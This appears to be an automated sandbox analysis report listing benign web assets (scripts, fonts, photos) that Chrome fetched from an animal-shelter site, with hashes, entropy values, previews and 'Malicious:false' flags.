                                                                                                                                                                                                                                                        Preview:!function(){var t={5560:function(t){var e;e=ThriveTheme.$,t.exports={isOnScreen:function(){let t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:["top","right","bottom","left"];t="string"==typeof t?[t]:t;const i=e(window),s={top:i.scrollTop(),left:i.scrollLeft()},o=this.offset();let n=!0;return s.right=s.left+i.width(),s.bottom=s.top+i.height(),o.right=o.left+this.outerWidth(),o.bottom=o.top+this.outerHeight(),t.forEach((t=>{switch(t){case"top":n=n&&o.top<s.bottom&&o.top>s.top;break;case"bottom":n=n&&o.bottom<s.bottom&&o.bottom>s.top;break;case"right":n=n&&o.right<s.right&&o.right>s.left;break;case"left":n=n&&o.left>s.left&&o.left<s.right;break;default:n=!(s.right<o.left||s.left>o.right||s.bottom<o.top||s.top>o.bottom)}})),n}}},551:function(t,e,i){(e=>{const s=i(8999),o=".error-message";class n{constructor(t){this.$form=t,this.addErrorFields(),this.$form.submit((function(t){n.submitAction(t,e(this))}))}addErrorFields(){this.$form.find(":input:visible:not(input[type=radio]),texta
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):75143
                                                                                                                                                                                                                                                        Entropy (8bit):5.411023262177534
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKcicI+0s:RIT7Vs9ZVKBYj8wKcHI+0s
                                                                                                                                                                                                                                                        MD5:72ABA4C9FEFC90EB8EC02D8B58FAD15B
                                                                                                                                                                                                                                                        SHA1:B7109116AC5E29A44DB4F8FE569D24293EA3FEE1
                                                                                                                                                                                                                                                        SHA-256:C831976892783ACEFA0FB4AE05B85910E1E0F3E50474F88DF3EA79CD0923C237
                                                                                                                                                                                                                                                        SHA-512:EEE5E7E8B9E7541C760BBB1D873E8F3C1004B115C140F6F2B02F22C3AF354CE67A21057AE8AFC977C6CD44AD142788B61239F89E82578C54AC6C565F1F03A80C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:19 19:18:43, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):73397
                                                                                                                                                                                                                                                        Entropy (8bit):7.928180657497868
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:p37L+uz1H2EE1NFnG7/S/wq/hZpGtV8prdl0H1rwtBiUOJ:p37RH1E1NFzLMtYrdl0H1EtBiLJ
                                                                                                                                                                                                                                                        MD5:8FB49257B555422E2CB73125A982AAE8
                                                                                                                                                                                                                                                        SHA1:DC5CFB2275B0FBE954EA30585CDF31B8DF86FC75
                                                                                                                                                                                                                                                        SHA-256:8C028FEC9C65E3F294C92E0BE6EA5190686F23BC546AC4C55B512F2B31B7659C
                                                                                                                                                                                                                                                        SHA-512:1BFF340AD898A55B999EEC9B634A2836A921B92FAAB9A4B6C8B6E89A2B2ED045BD65DE85FF0B9808B60629AAE3D3BE06B29534939FD4222C5B988EF73CF5843F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......{.......Apple.iPhone 15 Plus.H.......H.......18.1.1.2024:12:19 19:18:43.iPhone 15 Plus.H.......H......."."...........'...................0232............................................901.........901.........0100....................................................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...............-05:00.-05:00.-05:00..Q......)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....<...........2024:12:19 19:18:43.2024:12:19 19:18:43......%..o8...)..i.......................#.[.E.X.Apple iOS...MM.3.......................x.......h...x..............
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17021)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):382533
                                                                                                                                                                                                                                                        Entropy (8bit):5.659520032354517
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:VVAsKy+3IsyyHsdSVUCcv4bKonhsG75dGDhNcvnzH04:XToItasdnvWGDfiTR
                                                                                                                                                                                                                                                        MD5:CFCD75AA58E1ECC7CC909B2BC4CFED2B
                                                                                                                                                                                                                                                        SHA1:5B0CB3F7A0B59DB8C29BDE0F92F60188F8F4C6C7
                                                                                                                                                                                                                                                        SHA-256:D05C93DE2A9B56EF77546EAD84C86AEC85C218066BACA55A1C700D369FCC4D52
                                                                                                                                                                                                                                                        SHA-512:C9FCD6734AA3AB5BC6268AEFF47DD3554BFC704F60AE8CC09A6E8AB3B99024DFCD3F5E5AC3010A33B7AEAF4FD7F2AC480E3F9519E2CAB023A04946383FE534B4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":8,"vtp_value":true,"tag_id":11},{"function":"__ogt_ip_mark","priority":8,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":13},{"function":"__ogt_referral_exclusion","priority":8,"vtp_includeConditions":["list","petango\\.com","petango\\.stage"],"tag_id":14},{"function":"__ogt_session_timeout","priority":8,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":15},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR",
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):61698
                                                                                                                                                                                                                                                        Entropy (8bit):7.971349587862647
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:g333s83HIboR0k4EMwGY1e8sJyjsof/gcM:sP3ocnGQky9gcM
                                                                                                                                                                                                                                                        MD5:ABFDA0858DED608AD5556B47F689A259
                                                                                                                                                                                                                                                        SHA1:95D4FC3F204282BE03C01D274B06B2F84092591C
                                                                                                                                                                                                                                                        SHA-256:11C81F856C6E90EDD68D50F33C17414045E837B351AB1E1FD7B4F5A30775D1B1
                                                                                                                                                                                                                                                        SHA-512:4483D162FD0D71169C35DFB8B8EAD9E342D2DD1508925F75CCC2A347A825A8CDB8829D77BC79E1E8D8B672D5B37D3717BA892E8CB5230629E60491B11779C645
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H..............................................................................................................................................0...."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......q.I.Tr.j.:.&j.o.L..3..0..a...W..+.....J.X.c.... .1...Tw=.M....[..n...}.q.|.(.'?.....R....V.u..V..+.H.-..A....J..%.....*.f^3a7.VT?.V...........j..w..x\L.{..5...s........_...J..\....?yo..}.%?.M+.........5n...A.....\.~3....E.%....'.t........0*l....%.p76.....q...TI...<c...S]._=..g.....i4..z........l+....}l..`;g.A.......?4._2g.._..)gT_=].L05s.....Ta.w3.>.y.rl.T.;.{c..U
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=17.5.1, datetime=2024:11:19 16:54:13, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):60035
                                                                                                                                                                                                                                                        Entropy (8bit):7.914297279796416
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:931ZsmQEV6oTkKaGjm78qw82NqDtAme2oKR7w:93nDkKTm8qwHNytRen
                                                                                                                                                                                                                                                        MD5:081EB3A03772BAB53D508A6C51DDE48B
                                                                                                                                                                                                                                                        SHA1:DC1A4E197BA80ED7559673C2A980F2875E5C978E
                                                                                                                                                                                                                                                        SHA-256:3449051A754150D449E05C881F656596994F8078F19C07FC380102D67D7198AF
                                                                                                                                                                                                                                                        SHA-512:8EED9A293BEE5ADF628952878130154B2D91C623FE65143404D8141F5BFD467E203B2F18A81B2B6B0B3D28113A5BDF608A144ED54DF657701DC833AE3C50E252
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/c69de645-3962-47b9-80d8-eb755719f1b7.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......c.......Apple.iPhone 15 Plus.H.......H.......17.5.1.2024:11:19 16:54:13.iPhone 15 Plus.H.......H......."."...........'...................0232............................................453.........453.........0100........P...........................................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...............-05:00.-05:00.-05:00.)\_.....)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....(...........2024:11:19 16:54:13.2024:11:19 16:54:13..m......o8...)............................R.9.X.Apple iOS...MM.1.......................`.......h...`..............
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):71570
                                                                                                                                                                                                                                                        Entropy (8bit):5.482134577528733
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:1rPs4Hb1mF7JsAMrf8Hrw1XGIQ73xHN3XhgaBEyXT4jhqXz++C2QucXxj0wflfDg:msxfmmj6yU8l5+lMQVt5pLjnmPY2ZxyT
                                                                                                                                                                                                                                                        MD5:146D03538610544F0B5DF98B70BC29EB
                                                                                                                                                                                                                                                        SHA1:7AD311D14C4108264335495B2BADE4F46F0115AC
                                                                                                                                                                                                                                                        SHA-256:5C3C78A0C20CA0DB7B1927A8E14E39E902C8FBCB00D6AF2CD716513EA0616254
                                                                                                                                                                                                                                                        SHA-512:B83AA5CF9CC390D6CC96BE8A154F1D7791C04A6905FE212B19E2F73CA5402872FDC1B2D1AB5C8264E1D58AC70AAAED44A78A54449B3D7DC767F282B541987630
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/general.min.js?ver=10.4.2
                                                                                                                                                                                                                                                        Preview:(()=>{var t={41523:t=>{!function(e,o){const i=[];o.addResizeCallback=function(t,e){return-1===i.indexOf(t)&&(t.$$scope=e,i.push(t)),o},t.exports=function(){let t=o.$window.width();o.$window.off("resize.tar").on("resize.tar",(function(){o.$window.width()!==t&&(e.each(i,(function(t,e){e.call(e.$$scope||this)})),t=o.$window.width())}))}}(ThriveGlobal.$j,TCB_Front)},49110:t=>{!function(e,o){const i=[];o.add_scroll_callback=function(t,e){return-1===i.indexOf(t)&&(t.$$scope=e,i.push(t)),o},t.exports=function(){let t=o.$document.scrollTop(),n="";o.$window.off("scroll.tar").on("scroll.tar",(function(){const s=o.$document.scrollTop(),r=s>=t?"down":"up",a=n!==r;t=s,n=r,e.each(i,(function(t,e){e.call(e.$$scope||this,s,r,a)}))})),o.$window.trigger("scroll")}}(ThriveGlobal.$j,TCB_Front)},11481:()=>{!function(t){"use strict";const e=function(e,o){this.el=t(e),this.options=t.extend({},t.fn.typed.defaults,o),this.isInput=this.el.is("input"),this.attr=this.options.attr,this.showCursor=!this.isInput&&th
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3318
                                                                                                                                                                                                                                                        Entropy (8bit):5.389689202294015
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:jYgLfJc+ufYgLFNkYgCfJc+ufYgCFNkOLdcJc+ufOLd5NkOCdcJc+ufOCd5NE:Mk7Vk9p7VpZex6eMO
                                                                                                                                                                                                                                                        MD5:7271EBB988B913A45666130C05E27A42
                                                                                                                                                                                                                                                        SHA1:60279E64600C4E9450643FB84D1F917246A5AF58
                                                                                                                                                                                                                                                        SHA-256:F10A1D43C850FB1437DECCA89066F560295939631EAA0C0C3A6C45ADAF923273
                                                                                                                                                                                                                                                        SHA-512:8EF91FE6ADE30CD194C066B9FABF3D76F98F5FA79716FBA1292A6B084405CD65C6DB3F6E75C637A94A88D7A8447531A6A8F7E9597F107A8A9D49E2A50E01F5F3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:"https://fonts.googleapis.com/css?family=DM+Sans:400,400i,700,700i&subset=latin"
                                                                                                                                                                                                                                                        Preview:/* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKK58VXh.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'DM Sans';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKy58Q.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: italic;. font-weight: 700;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSE
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2481
                                                                                                                                                                                                                                                        Entropy (8bit):5.35541085385809
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:jOLdcJc+ufOLd5N0xXOgdcJc+ufOgd5N0xXOw6dcJc+ufOw6d5N0xD:jOLdcJc+ufOLd5NkOgdcJc+ufOgd5NkS
                                                                                                                                                                                                                                                        MD5:3B5E3D9C6C74DAF867C22A1D328A0CFD
                                                                                                                                                                                                                                                        SHA1:E3B97240B3D79E06649723B71C6884B81D72E9FF
                                                                                                                                                                                                                                                        SHA-256:E75548C5C25197546EF435302F9BADF39FADB67354EC0F488B1FDF20ADB304B2
                                                                                                                                                                                                                                                        SHA-512:3841929DF19EAC69A941E775842FF36CD36CB720456642CDE9FEB1B4968A0BCEA2B9D2187ABC85EFA4B520715D7F6DD00F989A5FBC5500EC453C73E19A9894B2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:"https://fonts.googleapis.com/css?family=DM+Sans:800,400,500&subset=latin"
                                                                                                                                                                                                                                                        Preview:/* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu6-K6h9Q.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'DM Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu0-K4.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: normal;. font-weight: 500;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9V
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, resolutionunit=2, manufacturer=Canon, model=Canon EOS R5, xresolution=153, yresolution=161, software=Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh), datetime=2024:12:09 14:53:06, xresolution=242, yresolution=250], baseline, precision 8, 420x280, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):48259
                                                                                                                                                                                                                                                        Entropy (8bit):7.935788194399393
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:n3nYyo5tKDWw+rQi+rPN2WdHqMspVhRKd1xPRsLlgFl0YujV/LWrQ0SoMwV:n3ns5ifPN2WdKTmd1ULeL/uRDmlV
                                                                                                                                                                                                                                                        MD5:ED76ADE5DB83125202BC46B346258FB6
                                                                                                                                                                                                                                                        SHA1:F2E3D95BF5A426A261F55545060714A5D79C1B16
                                                                                                                                                                                                                                                        SHA-256:CF9C1EAF43EBDFDEB5DAC454B08379BF82B437D06331864957101F23EE6BD54B
                                                                                                                                                                                                                                                        SHA-512:DCFCDDAFF57ACB44412D1EF31F8176F6C71693460837B795FB046B68C4C3A12B8D8216296F9225FFE23BFC6C1B99A383EF933C1A99CA6A85C67ED16F6F78FE1F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,.....hExif..II*.......(...........................................................1...5.......2...................................i...............Canon.Canon EOS R5.,.......,.......Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh).2024:12:09 14:53:06.H.......H....... .0...........2..........."...........'...................0231................................39..........39..................................................................................................1...........2...........4...........5...................................................................(...........0...........8...........@...........H...........P...........X.......-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.........#.......2024:12:09 07:37:26.2024:12:09 07:37:26.H.o.@B..........................@.........}......_S........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ....
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):47327
                                                                                                                                                                                                                                                        Entropy (8bit):7.971891393176044
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:9ho5MkFCPUHtQ3Dgu3RDEG/L3f+5fMMD+FYoIlCgIZnNEyJEuaU1EfQVVN6axge5:9ho5MkHQ3r3RDEG/7f+5fsnNcuaPQfWI
                                                                                                                                                                                                                                                        MD5:FFF2060DA63D20667027166D27F103BF
                                                                                                                                                                                                                                                        SHA1:DFDAF7CCF51F8EFBDEC1EC3A3C1A3024EED1B382
                                                                                                                                                                                                                                                        SHA-256:B099DB8A09249895D67AC5BCFC2D8D4809A3A48C9AFE00C2E083E6239373C84C
                                                                                                                                                                                                                                                        SHA-512:645DA9790762EA7D522922A3BF754EAE58B6298117CD0C93E52B3AB2939C770C995A43B8622EC3B29C5499CB1715AE6DA156244EF962C635067185B62D883EA2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/18b604e0-a421-4694-95bd-2dcc1c1b56dd.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....sxvM_..$.R.uu....2H.Q^#.cx....&.p..'.....U./....-.G.w.".v....K.:)T...4....>&....5.....8.<.X.#..=.`../e..~.....,....0C...O2...,.....t?.^..f.....+..d.{....bI?1..=.k...V.....|Sc!.M..u....B..t.5.>.o.m."..c4.wp["tQ....h.W..........d~T.v.L..\n..\..[...Nb.t.=5.. ..J..._.wI_.q.]...........7.5rw}.Z.P.....?..'.g....sT...iH..iR..y?.}/R...m>7...^v....y7....,Ip..U."xG.'....}G.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1626)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1819
                                                                                                                                                                                                                                                        Entropy (8bit):5.047296238035306
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:aUTV//j2ew8p/xnqy8VLF8Xlm7uEQGe1dLpDXzRRvCpx+zVfDpnOKLJWbqQApIsi:HgQBq5LYlm71TopDaW1ObqhuqVcPf
                                                                                                                                                                                                                                                        MD5:CD0EB3406096FF80266E7C9D7D419186
                                                                                                                                                                                                                                                        SHA1:0E3709691BF96233766DE30E2FD473B84166C5B6
                                                                                                                                                                                                                                                        SHA-256:C2E606E1FC82EA3A554AAD5D0520E25D2677B89A891DC5C49E7ACE08FCE92E25
                                                                                                                                                                                                                                                        SHA-512:3CAF5308CDBC5F42F1ECCF5944E8CA785AC086B85954765C1F40D91BD9CC9F3FE6EB816AD821B534F9AD36395F4B6B5D361BEA24EB272E94CAD2824F03FAAAC6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*!. * Masonry v2 shim. * to maintain backwards compatibility. * as of Masonry v3.1.2. *. * Cascading grid layout library. * http://masonry.desandro.com. * MIT License. * by David DeSandro. */.!function(a){"use strict";var b=a.Masonry;b.prototype._remapV2Options=function(){this._remapOption("gutterWidth","gutter"),this._remapOption("isResizable","isResizeBound"),this._remapOption("isRTL","isOriginLeft",function(a){return!a});var a=this.options.isAnimated;if(void 0!==a&&(this.options.transitionDuration=a?this.options.transitionDuration:0),void 0===a||a){var b=this.options.animationOptions,c=b&&b.duration;c&&(this.options.transitionDuration="string"==typeof c?c:c+"ms")}},b.prototype._remapOption=function(a,b,c){var d=this.options[a];void 0!==d&&(this.options[b]=c?c(d):d)};var c=b.prototype._create;b.prototype._create=function(){var a=this;this._remapV2Options(),c.apply(this,arguments),setTimeout(function(){jQuery(a.element).addClass("masonry")},0)};var d=b.prototype.layout;b.prototype.la
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):170
                                                                                                                                                                                                                                                        Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                        MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                        SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                        SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                        SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5268)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):329034
                                                                                                                                                                                                                                                        Entropy (8bit):5.5756644156430815
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:jEXy+3IsyjHuHSVQF6STnhsGP5H0uGDhNcvnzHVP:jEzItDuHbkuGDfiTd
                                                                                                                                                                                                                                                        MD5:BF83F55EC218DA85EECC4BE00375C7D8
                                                                                                                                                                                                                                                        SHA1:5D139A0D84CA5D44372B2E0EC50DA9BEDDBB8508
                                                                                                                                                                                                                                                        SHA-256:B3E91761EA4D635B229DF12D20570685DAFCE97299479F5490CB90C23A81B699
                                                                                                                                                                                                                                                        SHA-512:E90864801C10993C0CFEDE7B17689793D90D971DA28F6173FB5F3A1EF3402C6794BA631502D7D5FAEA8F31F1B0F7D55068256B6E073DE7291C7E51FFE8A228C4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
